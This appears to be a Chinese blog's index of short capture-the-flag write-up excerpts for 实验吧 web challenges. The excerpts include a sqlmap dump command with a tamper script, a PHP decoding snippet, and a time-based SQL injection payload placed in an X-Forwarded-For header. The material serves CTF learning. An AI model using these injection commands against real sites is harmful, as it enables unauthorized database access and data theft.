实验吧
0ne_
这个作者很懒,什么都没留下…
展开
-
实验吧-简单的sql注入之2
看到网上手工的wp那么多,就写一个sqlmap的直接kali终端一条指令sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php --dump --batch --tamper=space2comment拿到flag原创 2019-01-10 16:37:25 · 228 阅读 · 0 评论 -
实验吧-NSCTF web200
直接写个php脚本跑<?php$str="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";$_="";$_o = base64_decode(strrev(str_rot13($str)));for($_0=0;$_0<strlen($_o);$_0++){ $_c=substr($_o,$_0...原创 2019-04-25 21:09:48 · 228 阅读 · 0 评论 -
实验吧-who are you?
题目描述:我要把攻击我的人都记录db中去!打开题目发现:很容易想到是ip注入,试了x-forwarded-for:1.1.1.1,成功执行开始尝试延迟注入,发现返回页面相比没加sleep之前慢了很多,确实存在时间注入(sleep中的参数10是可控的,太小了不容易看出差异)x-forwarded-for:1.1.1.1' and sleep(10) and '...原创 2019-04-22 18:04:51 · 150 阅读 · 0 评论 -
实验吧-因缺思汀的绕过
F12查看源码,发现注释里有source.txt,猜测是源码文件,打开发现确实是源码。<?phperror_reporting(0);if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'."<br/>"; echo '&...原创 2019-04-24 22:31:50 · 211 阅读 · 0 评论